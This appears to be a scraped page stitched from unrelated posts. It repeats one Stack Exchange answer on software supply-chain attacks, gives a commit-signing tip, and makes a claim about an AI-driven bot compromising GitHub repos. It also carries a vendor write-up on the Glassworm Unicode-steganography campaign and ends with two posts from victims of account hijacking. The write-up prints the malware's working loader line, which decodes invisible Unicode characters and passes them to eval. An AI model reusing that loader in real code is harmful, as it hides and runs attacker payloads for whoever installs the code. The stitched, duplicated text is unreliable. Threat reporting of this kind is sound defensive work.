The problem is not particular to GitHub. It's not even particular to the issue of compromised credentials. Recently, we've had the xz backdoor, where a malicious entity slowly wormed themselves into a position of privilege in a project and inserted malicious code. We've had typosquatting and the use of names that sound very much like real, non-malicious modules used to publish malicious python code via standard repositories. We've had any number of thumping vulnerabilities introduced in major pieces of code by completely-authorised developers, without any malfeasance required at all.
The problem isn't limited to free software, either; the SolarWinds exploit used compromised credentials to insert malicious code into an entirely-proprietary software package. In the proprietary world also, fully-authorised developers are capable of doing it to themselves by accident; the CrowdStrike outage of 2024 involved no compromise, but still resulted in "the largest outage in the history of information technology".
So the problem is very real, but it's not specific to free software, it's not specific to compromised credentials, and it's definitely not specific to GitHub. It's not a simple problem, and it doesn't have a single, simple solution. It is, instead, an ongoing battle, in which many weapons may be deployed. These include, but are not limited to, constant vigilance, distribution of privilege, the increased use of schemes that allow one person to verify the correctness of another's work (checksums, digital signatures, reproducible builds), the slow decline of simple username/password authentication in favour of 2FA schemes, the massive increase in SSL deployment spearheaded by Let's Encrypt, and increased awareness of the importance of industrial support for fundamental free-software projects. All of these, and more, have their place in helping us all stay safe.
Edit: I also want to make the point that although the free-software development model may appear more vulnerable to malice (and I'm not sure I accept that that's anything more than an appearance, see above) I think it also really helps deal with things when they go wrong. The xz backdoor didn't make it onto any production systems, which I attribute to two principal characteristics of free software. Firstly, the distribution of labour between code authors, code packagers, and distributors; unlike with CrowdStrike, there's no one person or body whose approval can flush code from the dev systems to the desktops. The malicious code in xz took time to flow through the pipeline, which (fortunately for us all) enabled someone to catch it. Secondly, the availability of source enables anyone with clue to investigate. Andres Freund noticed anomalies in liblzma, and immediately had at his fingertips all the information he needed to dig down into the issue. He didn't have to ask some company's permission to access source under NDA, or worse, call some security hotline, tell them his concerns, and hope they'd be looked into sometime this century.
Answer from MadHatter on Stack ExchangeVideos
We’re officially in the AI-hacking-software era.
An autonomous bot powered by Claude scanned 47,000+ GitHub repos and successfully compromised several major projects by submitting malicious pull requests that exploited CI/CD workflows.
It wasn’t manual - it found vulnerabilities and exfiltrated tokens on its own.
The problem is not particular to GitHub. It's not even particular to the issue of compromised credentials. Recently, we've had the xz backdoor, where a malicious entity slowly wormed themselves into a position of privilege in a project and inserted malicious code. We've had typosquatting and the use of names that sound very much like real, non-malicious modules used to publish malicious python code via standard repositories. We've had any number of thumping vulnerabilities introduced in major pieces of code by completely-authorised developers, without any malfeasance required at all.
The problem isn't limited to free software, either; the SolarWinds exploit used compromised credentials to insert malicious code into an entirely-proprietary software package. In the proprietary world also, fully-authorised developers are capable of doing it to themselves by accident; the CrowdStrike outage of 2024 involved no compromise, but still resulted in "the largest outage in the history of information technology".
So the problem is very real, but it's not specific to free software, it's not specific to compromised credentials, and it's definitely not specific to GitHub. It's not a simple problem, and it doesn't have a single, simple solution. It is, instead, an ongoing battle, in which many weapons may be deployed. These include, but are not limited to, constant vigilance, distribution of privilege, the increased use of schemes that allow one person to verify the correctness of another's work (checksums, digital signatures, reproducible builds), the slow decline of simple username/password authentication in favour of 2FA schemes, the massive increase in SSL deployment spearheaded by Let's Encrypt, and increased awareness of the importance of industrial support for fundamental free-software projects. All of these, and more, have their place in helping us all stay safe.
Edit: I also want to make the point that although the free-software development model may appear more vulnerable to malice (and I'm not sure I accept that that's anything more than an appearance, see above) I think it also really helps deal with things when they go wrong. The xz backdoor didn't make it onto any production systems, which I attribute to two principal characteristics of free software. Firstly, the distribution of labour between code authors, code packagers, and distributors; unlike with CrowdStrike, there's no one person or body whose approval can flush code from the dev systems to the desktops. The malicious code in xz took time to flow through the pipeline, which (fortunately for us all) enabled someone to catch it. Secondly, the availability of source enables anyone with clue to investigate. Andres Freund noticed anomalies in liblzma, and immediately had at his fingertips all the information he needed to dig down into the issue. He didn't have to ask some company's permission to access source under NDA, or worse, call some security hotline, tell them his concerns, and hope they'd be looked into sometime this century.
While the MadHatter has given a comprehensive answer, there is a specific feature of git that allows a measure of security even if someone has received unauthorized write access to the repository: commit signing.
This way, all commits in the git repository show cryptographic proof who authored them (as setting the author and committer to someone else is trivial otherwise).
(as mentioned below, keep in mind that this is only another layer of security, as GPG keys can also be stolen and the passphrase e.g. guessed or keylogged)
Gitlab even has a handy UI feature, which notifies you if the commit was signed, e.g.
An interesting development in a 7 month long campaign we have been monitoring from threat actors.
What started in March with some NPM packages infected with malware that was hiding using Unicode characters (Unicode steganography), moved to VSCode Extensions two weeks ago, and is now spreading malware on GitHub.
In May, we did a write-up about threat actors using Unicode steganography, basically using unprintable characters to hide malware within it -> https://www.aikido.dev/blog/youre-invited-delivering-malware-via-google-calendar-invites-and-puas
Unicode PUA characters are unprintable, therefore invisible in code editors but can be assigned values when the program runs.
It was a very clever way of hiding malware to make it invisible on screen, to make it more fun they even used Google Calendar links to hide payloads in Base64 encoded titles.
2 Weeks ago, on Friday 17th of October, we were the first to report that this same threat group had compromised multiple VS Code extensions via the OpenVSX Marketplace. This was undoubtedly the same group because they repurpose the exact same malware (same Unicode characters, same technique using Google Calendar invites)
Our posts
https://x.com/AikidoSecurity/status/1979207669044122111
https://www.linkedin.com/feed/update/urn:li:activity:7384985297136099328/
This malware was later analyzed by a different research group and named Glassworm.
Now it seems they have moved on from VSCode and gone into GitHub.
We have seen multiple accounts compromised and sharing malware using the same Unicode steganography technique.
As you can imagine, a lot of the compromised accounts are removing the commits, but you can still find examples of the malware by searching on GitHub -> https://github.com/search?q=onst+d%3Ds%3D%3E%5B...s%5D.map%28c%3D%3E%28c%3Dc.codePointAt%280%29%2Cc%3E%3D0xFE00%26%26c%3C%3D0xFE0F%3Fc-0xFE00%3Ac%3E%3D0xE0100%26%26c%3C%3D0xE01E&type=code
These are only the public repositories, and the issue could be much deeper in private repositories.
The threat actors have clearly stolen developer credentials, likely from their previous endeavors,and are now trying to embed their malware into various different projects.
the code itself
const d=s=>[...s].map(c=>(c=c.codePointAt(0),c>=0xFE00&&c<=0xFE0F?c-0xFE00:c>=0xE0100&&c<=0xE01EF?c-0xE0100+16:null)).filter(b=>b!==null);eval(Buffer.from(d('')).toString('utf-8'));
While it looks suspicious doesn't appear too bad until the realist the the empty string from(d(\`)). It isn't actually empty. Its hidden malicious characters that call an external payload. Theeval` function then executes that payload immediately.
That payload is the exact same malware we saw in the VSCode extensions that were compromised.
It also appears to use AI-generated code that is commited along with the malware to hide it and make it less obvious.
While the malware is almost identical in all three examples, it is interesting to see them applying slightly different techniques, getting better each time.
Full writeup here -> https://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties
Timeline
March – Aikido first discovers malicious npm packages hiding payloads using PUA Unicode characters
May – We publish a blog detailing the risks of invisible Unicode and how it can be abused in supply chain attacks
October 17 – We uncover compromised extensions on Open VSX using the same technique;
October 18 - Security firm analyzes the malware and payload, naming it Glassworm
October 31 – We discover that the attackers have shifted focus to GitHub repositories
This all happened over the course of a week
I executed a program and saw that nothing happened and realized that I made a big mistake. The logo on the program appeared to resemble WireShark.
I ran Malwarebytes, SuperAnti-Spyware, Windows security scan and CCleaner to try and clean up everything. Removed anything that came up. I thought I was safe and the next day my PayPal and G2A was hacked. I proceeded to changed the majority of my passwords and closed my paypal account. I also changed my credit card.
Then, the next morning, I noticed my Amazon account was hacked as I forgot to change that password. They ordered and archived a $600 order, added themselves to my amazon family and I cancelled and removed everything I could find. I tried recharging passwords again when they hacked my discord and sent spam messages to my contacts.
I finally had it and factory reset my PC, reinstalling windows from the cloud. I copied my documents folder to a flash drive to saved down my important docs. I reinstalled my programs. After this, I recreated a new G2A account with a second email that I had previously. Next day, I got another email saying my google account had suspicious activity and had an unrecognized login on the G2A account. I checked my google pay and they attempted to use carrier pay with my phone.
I changed my password for my email again and I think I covered all my bases but now I’m worried that it’s a sophisticated malware that my troubleshooting didn’t fix. Today, I noticed a potential login on my Steam with $600 worth of crap in my cart. Luckily, I removed all forms of saved payments everywhere so I’m not being charged. Changed my Steam password and changed my wifi password.
I have 2FA enabled on almost everything and am not sure how they’re bypassing it (Steam/Amazon/Paypal etc). What are my best next steps? Based on the above, is there reason to believe that my network is compromised? How should I go about resolving this?
Will answer necessary clarifying questions. I just want this to end.
the hacker changed the email and password some how also bypassing my 2step with the github app
i already contacted support its been 2 weeks but still no response